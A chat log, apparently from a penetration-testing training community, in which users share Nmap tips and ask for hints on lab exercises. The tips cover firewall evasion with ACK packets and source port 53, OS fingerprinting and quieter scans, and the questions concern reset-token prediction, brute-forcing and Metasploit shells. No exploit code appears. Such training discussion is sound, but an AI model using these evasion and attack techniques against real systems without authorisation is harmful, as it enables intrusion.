Additional tips:
=> Each OS by default uses a specific TTL when creating thier packets. This may help knowing the OS by looking at the TTL of the packets they create
=> Firewalls can be bypassed by ACK packets because they do not know if the packet is from the target or the attacker
=> DNS allows UDP connections that can be used (by connection with source port 53 by default) to have more information about a target

Performences:
=> Nmap has an option that makes him less noisy
=> Nmap can controlles the Timeouts and rtt of the packets he sends to make fast scans

vital adder
vale salmon
#

Sweet, thanks!

vital adder
modest token
vital adder
placid quest
#

@wind plaza try to read again

glacial blaze
#

Hi,
I am stuck on Broken Authentication - Predictable Reset Token, first question.
I can't figure how to reproduce show token for htbuser using the algo. I am using strtotime(2022-08-04 01:15:52pm) * 1000 to convert to epoch with milliseconds. Maybe this is where i am wrong.
Can someone help ?

rustic sage
#

try thinking at the command for the terminal

#

Hi i'm stuck in the Attacking common services module, in the sql section, i can't find the password for the mssqlsvc user because all the databases are not accessible. any hints?

plush edge
#

Hi!!
If any can help, most appreciated!

I got stuck on the Microsoft Fundamentals module, NTFS vs Shared Points section.

I have to set up a mount point with the given cmd, but when I do, it doesn't work. I tried using sudo apt-get cifs and update, but it get an error and doesn't really update either.

Any help?

wind plaza
#

I find something i can't understand, I use metasploit and try to get shell on the target. I success when I use the pwn box , but I failed when I use my own computer with vpn, do anyone know why?

#

both of the machine can reach the target machine

rustic sage
#

Have you found any solution?

sage yew
acoustic owl
vital adder
#

@rocky surge let me guest network chuck and cubes scam again?

languid dawn
#

👀

vital adder
# languid dawn 👀

yeah he try to scam me before, i troll him for a bit and reported him to pwning

languid dawn
#

yes he is now on vacation pepepray

half cave
#

I'm currently on module 35 section 223 trying to anwer the questions. However, I can't access any external services (CDNs) and so I'm getting a broken site and have an extremely slow connection - What should I do now?

#

Here's what the website looks like

vital adder
half cave
#

(the names)

vital adder
vital adder
half cave
#

"Web Requests" "HTTP Headers"

vital adder
half cave
vital adder
half cave
#

I mean it's sooo slow that the browser timeouts

cedar folio
#

so for Broken Authentication / Guessable Answers, I'm stuck on brute forcing it - looks like a few people just guessed the answer, but I'd like to figure out breaking it - i have the script to do it, just not finding the right wordlist. Can anyone give me a nudge? I've not "manually" guessed it either

cursive grove
#

What addressing mechanism is used at the Link Layer of the TCP/IP model? Hint: it's not IP.

pine dagger
cedar folio
hazy grotto
#

Anybody here going to defcon?

polar apex
#

i subscribed for the silver subscription which is +200 cubes each month but i didnt get any cubes, does it mean i got it next monthj ?